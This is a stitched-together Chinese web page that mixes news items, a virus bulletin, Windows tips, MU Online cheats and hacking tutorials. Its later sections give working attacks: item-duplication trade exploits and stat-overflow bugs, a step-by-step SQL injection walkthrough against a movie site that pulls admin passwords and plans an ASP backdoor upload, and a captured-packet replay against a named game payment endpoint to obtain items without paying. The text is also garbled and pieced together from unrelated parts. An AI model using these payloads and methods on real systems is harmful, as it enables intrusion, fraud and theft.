昨天下午,当记者在Google上以“hao123”为关键词进行搜索时,竟然找不到这个国内知名分类网址网站的链接,之后记者尝试采用搜狗、中搜等国内其他搜索引擎搜索,hao123网站链接都出现在搜索结果的首页头条。
据了解,hao123原本是国内著名个人网站,半年前由百度公司出资5000万元买下,专门为用户提供网址链接服务,目前该网站流量排名全球第15名。百度方面在接受记者采访时表示,他们也已经发现了这种异常情况,并已经向Goolge发出“沟通函”询问其中原因。耐人寻味的是,业界近日刚刚传出Google将设立中国办事处的说法,而此前著名调查公司艾瑞发布报告显示,在英文市场所向披靡的Google在中文搜索市场已经排在百度和雅虎之后。针对业内人士猜测这可能是Google出于中国市场竞争考虑,牺牲一直引以为傲的中立性来屏蔽对手网站的说法,由于Google目前在国内还没有公开的代表机构,记者目前尚未与Google取得联系。
本日热门病毒:
“新CIH(Win32.Yami)”病毒:警惕程度★★★★,文件型病毒,通过感染Windows可执行文件传播,依赖系统:WIN2000/XP。
“新CIH(Win32.Yami)”病毒会驻留在系统内核。病毒判断打开的文件是否为Windows可执行文件(PE)文件,如果不是则不进行感染操作,是则将病毒插入到PE文件各节的空隙中(与传统的CIH一样),所以,感染后文件长度不会增加。由于病毒自身的原因,感染时有些文件会被损坏,导致不能正常运行。它发作时将企图用“YM Kill You”字符串信息覆盖系统硬盘,并且使数据恢复相当困难。它同时通过向主板BIOS中写入垃圾数据来对硬件系统进行永久性破坏。“新CIH”病毒与CIH相比可以传染Win2000/XP系统,具有更强的传染性。
反病毒专家建议:建立良好的安全习惯,不打开可疑邮件和可疑网站;关闭或删除系统中不需要的服务;很多病毒利用漏洞传播,一定要及时给系统打补丁;安装专业的防毒软件进行实时监控,平时上网的时候一定要打开防病毒软件的实时监控功能。
如遇病毒,请拨打反病毒急救电话:010-82678800或访问瑞星反病毒资讯网:http://www.rising.com.cn。
据台湾媒体发自东京的报道,日本和中国之间对钓鱼岛的领土归属,存有长期的争议;日本和韩国之间,对竹岛的主权问题,也有强烈争执。如今日本政府公开指称,这两处岛上都有日人登记户籍,是否会激化中韩两国的反应,值得观察。
日本政府17日接受在野的民主党众议院议员岩国哲人书面提问时,针对这些争议岛屿的住民问题,做上述回答。日本政府同时指出,这些人的籍贯虽设在各个岛上,但各岛上“并没有人”实际居住。
而韩国媒体曾报道,韩国国会议员准备将籍贯地迁至竹岛(韩国称独岛)。为此,日本政府说,日方已向韩国要求确认情况,如果属实,日本政府将要求韩方取消这项户籍迁移登记。
2.在保存网页前,可以按一下"ESC"键(或脱机工作)再保存,这4婧芸?
3.用电脑听CD可以不用任何的播放软件,把音箱线直接接到光驱的耳机孔,放入CD,按光驱上的play键就可以直接听了,这样听歌可以不占用系统资源。(如果你的电脑坏了,不能启动或什么的,一时放在那不能修,千万不要浪费资源,把用里面的电源给光驱通上电,就可以暂时做CD机了.
4.MSN中发消息的时候是按enter的,如果想要换行而不想发出消息,可以 shift+enter或ctrl+enter
5.浏览器的地址栏里可以调试简短的HTML代码。方法如下:地址栏写 about :abc 回车,就看到效果了.
6.Windows快捷键:
win+m 显示桌面
win+pause 系统属性
快速重新启动:按确定前先按shift(不适用于2k、xp).
彻底删除:shift+del
不让光盘自动运行:按shift
Ctrl+Esc:相当于"开始"或WIN键
Ctrl+Home:将游标移至文字编辑区的开始始(Home单用:移至列首)
Ctrl+End:将光标移至文字编辑区的终点(End单用:移至列尾)
Alt+F4:关闭当前视窗(若是点一下桌面再按则为关机)
F2:更改名称
windows+e 资源管理器.
windows+r 运行.
windows+f 查找.
windows+u 关闭系统.
windows+d最小化所有窗口,再按一次Win+D可回到最小化前的窗口.
windows+m最小化所有窗口,但再按一次无法回到最小化前的窗口.
Shift+F10,可以打开所选项目的右键菜单.
按住 CTRL+SHIFT 拖动文件:创建快捷方式.
7.关机快捷方式
(1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>
(2). 在<指令行>键入 rundll.exe user.exe,exitwindows
(3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成 >
8.重新启动快捷方式
(1). 重复以上 (1)
(2). 在<指令行>键入 rundll.exe user.exe,exitwindow***ec
(3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按< 完成>
9.RUN - > cmd 或者command
就会看到DOS窗口。不知道大家注意到那个小小的图标没有,在左上角。
点击这个图标, 就会看到下拉菜单, 尤其是Edit下的一些功能, 很方便
10.con、nul是MS系统的保留名,它不能做为文件名!检查你的web空间是不是M 系统,可以建一个con的文件夹试试
11.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令 行下输入 "tree /f > index.txt".打开index.txt看一下是不是一目了然
12.保存无边窗口页面请用CTRL+N新开窗口
13.如果一个文件夹下有很多文件,如果想快速找到想要的文件,先随便选择一个 文件,然后在键盘上选择想要的文件的第一个字母就可以了
14.说个QQ隐身登陆的笨办法:
在网吧上网,如果直接从注册向导登陆的话QQ是上线登陆的,可是有时候却不 希望现身,怎样实现隐身登陆呢?
就是拿一个没用的QQ先从注册向导登陆了,选择状态为隐身,然后在系统参数 中选中以隐身方式登陆,点确定,然后直接在这个QQ上运行注册向导登陆你要 登陆的QQ,你会发现现在QQ是隐身的了。
15.win98改ip不重启的办法:
1.改完ip选择取消。
2.在设备管理器里禁用改了ip的那块网卡。
3.启用网卡。
ok,你改的ip已经可以用了
16.2000和xp下运行"cmd",进入dos窗口,复制和粘贴都用右键完成
17.收藏夹不要放在系统盘,以免忘了备份,每次装完系统用"超级魔法兔子“指 定路径
18.对于系统不明白的地方,平时多看windows自带的帮助,不要盲目去找人解决 ,也许帮助才是最快和最全的。(其余软件也是同理)
19.winxp自带批量重命名功能,只要选中一堆文件,选重命名,然后改第一个文 件,改完后,其他文件也会自动修改
20.上网时在地址栏内输入网址,系统会记录下来,虽然方便以后不用再重复,不 过如果是公用的机子,又不想让别人知道自己到过哪些地方,可以用“CTRL+ O(字母O,不是0)”,这时对弹出一个“打开”对话框,在其中的地址栏内 输入网址,就不会被记录下来了.
0.98版本漏洞
=======★★★关于0.98c的复制方法★★★=====
复制必须要两个人,假如主角是A 对方是B
A按ESC键 B交易A 交易两次 第二次交易要在第一次交易取消以后 等B交易完之后 A先点OK 再点取消 然后把要复制的东西放入仓库 接着A回来交易B
B点OK A走开 复制成功 你会发现你放到仓库的东西又重新出现在你的包裹里 注意:不要把复制的东西和真品同时放在包裹或者仓库,不然后果不堪设想 不信你们自己可以试试 如果有人知道0.98c怎么刷卓越全属性装备请加我QQ8549128请告之,谢谢!
三连击
决斗系统所设定的60%普通攻击有效,再加上战士COMBO的三连击
想想是多么恐怖,一个天地十字剑+霹雳回旋+袭风刺(双重伤害),最后附加激活的combo总攻击。能上1000的伤害。当然不一定在使用的过程中能全部打中,因为对方可以跑
但是如果他跑的话,他就根本没办法打死你。
而其他职业只能继续保持原来的攻击方式,因为只有60%的攻击力,所以对于上1000血的+11黑凤凰战士只能是隔靴挠痒!
法师瞬移PK,那根本就打不死人!
精灵的冰封有点威胁!
战魔根本咬不动!
三连击图
决斗系统最大受益者-战士!
最后的一击太猛了!没上千血的被最后一击打中,必死!
另外,霹雳回旋变弱了,以前对在身边的怪物用霹雳,会有2个伤害,现在只有一个了。
的确是个很大的BUG.袭风刺现在的威力很大.消耗的技能值变少好多,几乎可以无限使用.有时是2次伤害3次伤害..稍微强点的战士赶快去城堡和敏弓枪城堡任务吧.袭风刺一定不会让你们失望的~~
☆版主提示:或许有人问3连击是怎么设定的?是你使用的武器本身技能+霹雳回旋+袭风刺或雷霆~来设定的
===============================★★★0.98C复制方法★★★================(此法适合官方,强烈推荐)
本站声明:因复制出现数据溢出、删档等后果,本站一概不负责!相关技术问题请咨询作者或到留言板留言!
关于用99复制的问题99可以实现2次交易,不用和任何人说话的,B交易A,A用99奇迹,等B屏幕上显示交易取消的时候B再交易A,然后A点确定,就可以了,B把要复制的东西存仓库,但是现在问题就出现在这里了,我也不知道怎么办,大家研究下,问题就是B不能和别人交易了,即使A交易B,B点了确定,还是取消了交易,哎,还欠东风,大家想想办法啊,大家共享一下嘛~别小气哦
0.97-0.97D版本漏洞
==============★★★0.97以及旧版本,复制方法★★★=========
要复制物品者为A,补助设置者为B,必须可以用0.97版外挂方可使用复制方法
1:A去仙踪林,点卡隆出现对话
2:B一直交易A,并且要快,一直到A那出现交易提示。这时A选确认,不过还有个交易提示,第2个要选取消。A取消交易界面,但是B的交易栏必须还在,否则失败。
3:A取消交易,B不要取消交易,也不要动,B的交易栏还在的。这时A取消交易后就能动了,去仓库,把A要复制的东西存进去。
5:回去交易B,B点确认,然后A或B取消交易,复制成功
(点守卫,大天使使者,咔隆,都能复制)
0.97以前版本物品复制方法II:
1:A去仙踪林,点玛雅葛布林交易,出现对话框按V
2:B交易A,等到A那出现交易取消。在交易A(要快!)这时A选确认,不过还有个交易提示,第2个要选取消。A先取消交易,然后B再取消交易
3:这时A取消交易后就能动了,去仓库,把A要复制的东西存进去。
4:回去交易B,A,B同时确认就OK了.
其实可以同步的,B把要复制的东西放在身上在第2步完成后把要复制的东西放进仓库,然后和A确定.这就是2个人同时复制,效率提高!
关于奇迹私服复制问题解答:
1:复制物品是不需要开外挂的,只要不是0.97B都能复制
2:如果GM大概物品检测,你复制东西动了掉线,请卖到商店。
3;并不是什么物品都检测到的,大部分是无法检测到~!
===★玩家01036的另类复制方法:
方法一:A,B。 A交易B,B不要确定,访问卡隆的同时,A再交易B,A点确定。然后放些垃圾在交易栏上。A不要点取消,开仓库,B访问卡隆,A把东西放进去,走两步,再看看身上,复制成功。这是回档法复制!
方法二:注册两个中文账号,账号为10个中文,同时登陆服务器,两个仓库是一样的。
方法三:两个人利用交易超时。。。我也不是很清楚知道的补充一下。
希望大家不要太自私,出现了问题,不要逃避,让大家来共同研究,共同解决。
================★★★杀人不红名★★★==作者:永恒的法师
在盟战结束后.可以继续杀对方盟里的人而不会红名=
比如 我方以20:10赢了对方后..杀一次对方盟主.分数变成22:10, 战盟的SCORE也会再+1..可以一直杀几次(时间不能太长)
================★★★GM命令★★★=====
此方法因个别私服而异=本页下面有GM命令最新资料
我就知道几个啊 ,大家别笑话(设定GM是A, 一普通玩家为B):
1。/追踪 B=奇迹漏洞网http://allbug.xicp.net提供
2。/move A(或者B) 3 15 15 :3 代表地图仙踪林,15 15是一个坐标
我只知道地下的代码是1,冰的代码好象是2。城堡的 代码分别是11,12,13,14,15,16
3。!大家好 为发表公告:大家好
补充:GM的移动指令为 /移动 本人名字 地图代码 众坐标 横坐标
================★★★转生漏洞★★★===
最近玩东方的时候无意中发现了一个无限点数的BUG,找一个可以在线加点的SF,等点数够在线加点时候,下线,进入在线加点程序,分配好点数,然后就狂点提交,注意,不要点的太多,太多了回变负数的,好象是3W以上就变负数,我朋友试过,我一发现这个BUG后,就马上练了个小号,让朋友带我进了次血城,出来后就刷点,才一个小时,20000的敏捷,25000的智力,血你怎么杀都杀不完的超级BT妹妹就出来了,哈哈~~~天魔都打不动我,不过才玩了一天,我的帐号就封了,有风险,各位想玩,就再注册个小号玩玩吧,
==============★★★法师穿MM装备衣服漏洞★★★=====
首先你必须有个华人外挂!接着你用自动登入先登入一个人物(角色1),接着在自动登陆里换人物(角色2),点回到角色画面外挂自动登上去!想让别的职业穿不同的装备 前提是 角色1和角色2不同职业!可以用这个漏洞让1级的新人可以M别人 可以交易嘿嘿!
================★★★马和彩云兽的小漏洞★★★=====
有的私服没有卖马和彩云兽的吧!还有玛雅比较贵!
这样自己合成个彩云兽死了!就太浪费了!如果你那的祝福灵魂比较便宜那!那就好办了!先把彩云去血,一般去8点血以上就行了~
然后做个阴影点彩云~彩云每+1彩云的血就会比以前多了1点血点到+7~去他8点血足够了吧!当然去多了也没事只要不死就行了!然后你那去使用吧!只要彩云不死我们就能让他加血!你看到彩云少与7点血的时候~再去做个阴影~用灵魂点暴他~变+0的~彩云是不是有变很多血了那?
还有如果你感觉彩云的属性不好用生命贴吧!就是没有属性的也能贴出属性来!!属性感觉不好就继续贴贴到喜欢的属性为止!!!!
PS:做阴影其实很简单!只要你机器不卡!私服卡不卡没关系!不卡更好!你去买个能点祝福的东西!把东西卖了的时候迅速点回物品所在的地方!一定要点原来在你背包的为止点正一点不错啊!100%能做出阴影!!
没事你点点恶魔看看+7的比较好看点~亮了一点~但必须要先去他8点血啊!
==============★★★法师的无敌守护+血法★★★====
前提是守护够140%(具体多少我不太清楚,140肯定行)吸收伤害,给自己+上守护后找人狂打你,会发现你的血量激增(我的没有+过体力的法师,被朋友用爆炎砸到了14万血)这个时候就可以轻易的杀死反射战士了。具体你现在有多少血要从你的组队看(P键打开)。在你杀人的时候,可以叫朋友不停的攻击你,因为这种血两的增加是暂时的,很快回消失。另外同理,你也可以给朋友套个守护再一直攻击他,把你的朋友也变成超级血牛。
==============★★★法师反射杀人法★★★==作者:拎壶冲
法师反射杀人法(此方法纯属朋友口述,没有尝试)140%的伤害吸收守护,要求至少有5000敏捷,5000智力。穿全套的反射革装,带的首饰不能带回血,另外要求有一定的血量。套上守护以后。任由别人打你。自己不受伤害,对手却要受到反射。
☆版主的话:次漏洞尚没通过完全验证,望测试得到的朋友到论坛发贴
=============★★★几个小漏洞发现★★★==
据作者君然了解到:点门票那个和魔剑士那个就是到了98也应该可以用
1,魔剑士用能量球:有变身功能的服,现在转成法师然后转魔魔就会能量球了
2,万能门票:用个幸运的东西做影子把门票点到9就变+0的了(万能!)
3,新翅膀合成100%:在服务器最卡的时候合,最好是随便合个东西都要闪2,3分钟的时候合成是不会失败的(我在龙之魄21%的成功率就合了 97版的时候合的)
不过不出好属性不知道为什么
==============★★★GM代码和相关内容★★==
打开SQL中表character,更改你的人物的 CtlCode值为 8,就是GM号了
设置了GM号,想自己移动就输入/move GM名字 地图编号 X坐标 Y坐标就行了。例如移动去勇者大陆
/move 我是GM 0 100 100,就是把我是GM移动到勇者大陆100,100的坐标。
CtlCode代码的意义
0 普通角色(此角色可以使用)
1 被封角色(此角色无*使用)
2 物品角色(此角色可以使用,但身上物品无*转移)
4 隐形角色(此角色可以使用,只有自己看着隐形,别人能看见)
8 管理员角色(此角色可以使用,具有管理员权限,可以用GM命令)
(转自wily2000,感谢)
GM代码
其他的代码只是这些代码的组合,如6=2+4(无*转移物品的隐型角色),10=8+2(无*转移物品的管理员角色),12=4+8(隐型的管理员角色),14=2+4+8(无*转移物品的隐型管理员角色)
/停权
/解除停权
/guidemove 战盟移动 /GuildMove 战盟名称 地图编号 坐标X 坐标Y
用*和/move一样,但这个是把当前在线的战盟成员全部移动到你指定的地方,这样,GM就可以把两个盟的人召集在一起,在你的监督下进行盟战或其它活动了!(谢谢ydll)
/guideend 战盟禁止
/warend 战斗结束
/制造 (用*未知)
/连线状态 (显示在线人数) /连线状态 等级-等级
/追踪 移动到人物身边 /追踪 名字
/监视 显示为乱码 /监视 名字
/Disconnect 断开连接(踢人)
/Move 移动任意角色到指定位置 /Move 名字 地图编号 坐标X 坐标Y
// 地图号: 0:勇者大陆, 1:地下城, 2:冰风谷, 3:仙踪林, 4:失落之塔, 5:未知地图(move会出错), 6:竞技场, 7:亚特兰蒂斯 8:沙漠 9:恶魔广场 10:天空 11:血色城堡 11血1 12血2 依此类推
/Trans (不明白)
/SetBlock 封号
/UnsetBlock 解封
/DisableChat 禁止聊天
/EnableChat 允许聊天
/GuildMove
/GuildDisconnect 战盟断开
/GuildWarEnd 盟战结束
/GuildWarStart 盟战开始
/GuildWarStop 盟战停止
/Make 制造(用*未知)
/RemainTime 剩余时间
==========★★★外挂飞入罗马竞技场漏洞★★★=========
进入竞技场(/移动 竞技场)后 用外挂移动到 30 40这个地方 就可以进入古战场了 里面好华丽的~用外挂的话 就飞到很大的空白的地方 看到没有烟雾了(机器也不卡了) 就对了不用外挂的话 要2个盟主 开盟战 靠墙 杀了对方可能会传送过去哟
==========★★★MU在线加点N大的BUG★★★=============
大家应该知道以前的在线加点BUG~在前面打上负号就可以了但是这个BUG已经不能用了~经过本人的长时间研究~终于~知道了~
在在线加点的4个格子里每个打.99999 不但不减自己拥有的点数~还各个技能+1唯一缺点~费钱啊。。。。。。。。。。。。。。。。。。。。大家先试试好用不好用~
=========★★★刷祝福碎片方法★★★===== (某些私服可以使用)
贴这个漏洞时候~唉~已经过时了~不好意思啊~但也得贴出来~~ 方法就是用祝福点奇迹通宝变祝福碎片~方法就是这么简单
===========★★★MM带弓再拿武器的双手漏洞★★★=====
适用与0。98版本以下(0。98私服版本没试过)
确定MM身上装了弓(列如:玛雅神弓 比较靓) 接着准备一把可以使用的单手武器放在道具栏里(列如:雷神之剑 亮。。) 接着找一个人你打/交易(事先说好叫那人什么都别按)接着出现了你向XX提出交易,这时马上按I打开道具栏把装备在身上的神弓拿起别放下,等待申请交易超时自动取消,接着你发现了你的神弓“不见了”(还在!只是你自己看不见) 接着装上事先准备好的单手武器!OK!下线在上登陆人物画面的时候别惊讶! P。S:注意必须是弓类武器放(右边)
必须是单手武器(左边) 此法还可以卡天马 卡小马 可以骑天马放技能(别人看的见) 带翅膀的战士骑天马(卡没了)可以直接放出流星焰
此法最原始的开始于卡盾年代
===========★★★靠墙方向移位漏洞★★★=====
任何版本!
座姿矫正。。。-_-!!
先准备一个变身戒指(骷髅兵的免),在大陆有铁栅栏可以靠上去, 开始分解动作
1。人靠上去
2。带上戒指
3。鼠标朝任意方向摆 主要让自己方向变化
4。取下戒指!
哈哈你的PP对别对着别人哦!
☆版主蓝翼补充:冰的177 34靠门大柱子靠上去居然是空1个格子的
=================================★★★0.97B和0.97D的复制方法★★★=====================(推荐)
有3个方法,本站搜索期间比较辛苦,转贴请著名来源网站。这3个方法基本相同,相关技术问题请与作者联系!复制时候建议用这3个方法联合一起~
本站声明:因复制出现数据溢出、删档等后果,本站一概不负责!
第1个方法 (此法支持0.97B的复制)
D版复制方法
要等血色或者广场开门的时候。要2个人。
A。是拿着要复制的装备。帮装备放到包包里,然后点激卡隆或者大天使。等进入广场或者血色的对话框出现了。然后B立刻交易A。A选交易。然后就点激你可以进入的层次。一般都是满人。然后B的画面里就出现了交易栏。A就不用管它。走去仓库,把要复制的东西放进仓库里面。然后B就取消交易。跟着A交易B,出现交易栏之后。A按取消交易。
这样。要复制的装备又在你的包包里出现了。这就成功了。
第2个方法
我的复制也是从别人那学来的,适合0.97D,只要两个人。是很简单的那种,至于我个人
没什么建树(嘿嘿)。我的复制方法是:
在血色或者广场开的5分钟内进行复制,(时间很紧,要抓紧)[前提:进血几要带加几的
披风;进广场嘛,带个加0的卷就可以了]
方法===A带要复制的东西和披风(或卷)点大天使(或卡龙),这个时候出现一个选择进
血色几(或广场)的框,先不要点,这时候由B交易A,A点确定,再进该去的层数,这时
候A会被大天使反弹出来,就马上回仓库,把要复制的东西放仓库,这个期间B不能动,直
到A把要复制的物品存储完毕,然后走动,B交易A,都按确定,A再看包裹,嘿嘿,复制成
功。
切记:原物品和复制品不能放在同一物品框。。。。。。。。
第3个方法
要3个人.假定复制人为A.帮手为B C
血城开门时.A点大天使使者.(身上要有相符的票)出现进入选择时.B交易A.A先OK.这时B上出现交易栏.而A还是进入血城的界面.A点进入的血城层数.这时会被弹出来.有时会乱飞.没事.用移动命令移动一下.然后把要复制的装备放仓库.关闭仓库后.C交易A.A选确定.出现交易栏后.A取消交易..B再取消就行了.整 个过程中.B要一直=到A和C的交易取消后才能点取消.否则会失败.此方法可以刷箱子.我经常打满仓+5箱子.然后再扔.手快可以扔2~3次.当然.我都是到失落这些没人的地方扔了.扔箱子的话 C要先和A组队.方便捡物.只要打一次箱子.永久使用.而且就算开了复制也没用.原本的已经扔了.扔出的物品都是不同的.当然不算是复制品.
也可以刷钱.对关了刷钱的服务器.我是合好几个新飞飞.全点9~16.把放仓库这步换成卖NPC就行了.C一交易取消后.翅又回来了. 不过要注意带的钱的限制.我第一次刷时太狠了.过了20亿.(5个飞.其中一个XY.一个+S其它普通的.)成了负数的钱了..而且卖东东更快.开一次血或广场的5分钟可以卖N次.几个人轮着刷.全成了有钱人
建立隐藏的超级用户多种方法 | |
| 作者:黑客基地 | 文章来源:本站原创 | 点击数:1070 | 更新时间:2005-3-26 | |
一、如何在图形界面建立隐藏的超级用户 如何在命令行下远程建立隐藏的超级用户 | |
| 杂志录入:hackbase 责任编辑:hackbase |
适用情况:
1)数据库是MSSQL
2)连接数据库的只是普通用户
3)不知道ASP源代码
可以进行的攻击
1)对数据内容进行添加,查看,更改
实例:
本文件以
为列进行测试攻击。
第一步:
在输入用户名处输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 80040e14
字符串 之前有未闭合的引号。
/user/wantpws.asp,行63
说明没有过滤单引号且数据库是MSSQL.
第二步:
输入a;use master;--
显示
Microsoft OLE DB Provider for SQL Server 错误 80040e21 多步LE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。没有工作被完成。
/user/wantpws.asp,行63
这样说明没有权限了。
第三步:
输入:a or name like fff%;--
显示有一个叫ffff的用户哈。
第四步:
在用户名处输入
ffff and 1<>(select count(email) from [user]);--
显示:
Microsoft OLE DB Provider for SQL Server 错误 80040e37
对象名 user 无效。
/user/wantpws.asp,行96
说明没有叫user的表,换成users试试成功,同时说明有一个叫email的列.
输入a having 1=1--
一般返回如下也就可以直接得到表名和一个字段名了
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.ID 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
/user/wantpws.asp,行63
现在我们知道了ffff用户的密码是111111.
下面通过语句得到数据库中的所有表名和字段名。
第五步:
输入:
ffff;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad然后根据表名ad得到这个表的IDffff;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
同上可知id是:581577110由于对象标志id是根据由小到大排列的所以我们可以得到所有的用户表的名字了象下面这样就可以得到第二个表的名字了ffff;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
ad 581577110
users 597577167
buy 613577224
car 629577281
learning 645577338
log 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk
经过一段时间的猜测后我们得到上面的分析一下应该明白password,users是最得要的
第六步:猜重要表的字段
输入:
现在就看看users表有哪些字段
ffff;update [users] set email=(select top 1 col_name(object_id(users),3) from users) where name=ffff;--
得到第三个字段是password
ffff;update [users] set email=(select top 1 col_name(object_id(users),4) from users) where name=ffff;--
得到第四个字段是name
最后users表的字段共28个全得到了
(注:另一个得到字段的办法,前提是系统的返回出错信息
a group by ID having 1=1--
得到
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.userid 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/user/wantpws.asp,行63
这个第二个字段就是userid
显示第三个字段。
a group by id,userid having 1=1--
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.password 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/user/wantpws.asp,行63
得到是password
同理,一直显示出所有。:)
)
users表
1 2 3 4
id userid password name
5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send
17 18 19 20 21 22 23 24 25 26 27 28
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note
starlook--12 10 2003 2:41PM
nlook---0
nos---2 登陆次数
date--12 10 2003 12:00AM 注册时间?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。 说明
password表
1 2 3
id name pwd
然后我又试ad原来是用来记录广告击点的。。
然后又试password表得到有name和pwd字段。
执行
ffff;update [users] set email=(select top 1 name from password) where name=ffff;--
可得第一个用户名是admin123看样儿多半是管理员了。
然后又得到了密码是dy***dick188还是打星号算了哈哈...
这样我们就完全进入了这个电影网站的后台了哈哈。
_blank>http://www.dy***.com/login.asp
再进一步还可以知道管理员一共有三人密码也都能看到了。
ffff;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
ffff;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
ffff;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
只是能免费看电影好象还不够哈..我看了看它的后台管理原来在添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就能上传一个asp后门并执行
首先进游戏随便购买一件东西.进入交费页面. 取得SESSION认证
切换回桌面.用浏览器访问
_step01.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step01.asp?gameid=用户ID
然后再用溯雪载入此页.按购买.然后CTRL+I分析表格.得到物品代码.物品代码属性名为
SUMPID.
启动WPE进行嗅探.马上切换回游戏购买物品.
购买完成回WPE查包.
内容.
POST /payment/payment_step03.asp HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*..Referer: _step02.asp..Accept-Language:" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step02.asp..Accept-Language: zh-cn..Content-Type: application/x-www-form-urlencoded..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)..Host: tradegzbp.9you.com:15000..Content-Length: 98..Connection: Keep-Alive..Cache-Control: no-cache..Cookie: bbscookie=8890517; 9youcookie=%2512%25E8%25AC%25EA0%25D0C; avatarcookie=6f377d52e99d4c1cc40788afea85f97c; newscookie=%25A5PcA%25ED%2502%2595%259B%25A4%25A5; mmcookie=%253C; ASPSESSIONIDCCRCCRQB=OOOJKAAACABKLDDNJIDCEADC....gameid=jamggg&SumPid=4747&SumgName=%B9%C2%B5%A5%CB%CC%D6%F7%CC%E2%CC%D7%D7%B0&chkCashType=GC&UserPwd=119&x=85&y=25.
从COOKIE=后数值不和上面相同.请注意.依自己抓的包而定.
修改后面这部分
gameid=jamggg&SumPid=4747&SumgName=%B9%C2%B5%A5%CB%CC%D6%F7%CC%E2%CC%D7%D7%B0&chkCashType=GC&UserPwd=119&x=85&y=25.
依次为游戏ID.物品代码.物品名.卡类.密码.请自己更改.
把SumPid=改成想买的未出售物品ID.SumgName改成想购买的物品名字(为汉字urlencode编码后的值)
后面还有一个包.需要使用.为发送状态.包的内容我没有保存.请自己去抓.内容为payment_step02.asp 验证通过.将此包保留下来.和上面的包各名为 包1 包2
.进入游戏.再次随便购买物品.进入到购买界面.开启一新网页浏览器.访问
_step01.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step01.asp?gameid=游戏帐号
有错误提示不要按确定.
然后到WPE内发送包1.发送包2.
然后直接访问
_step04.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step04.asp?gameid=游戏帐号
提示成功购买.下线重上.PASS了.
关于物品ID及名字.
请找一位在韩服玩的朋友.问一下物品名字.及按上面方法取得的物品ID.
----------------
其他.需要M币的装备.
.去弄个密码和你主帐号一样的用户名.里面要有M币.
先购买次普通物品取得COOKIES.
然后按COOKIES位置(封包内写了)把有M币的ID除了用户名外的COOKIES数据全部替换到现在使用的ID的COOKIES上.(浏览器打开的情况下).然后按上面的方法做就可以了.











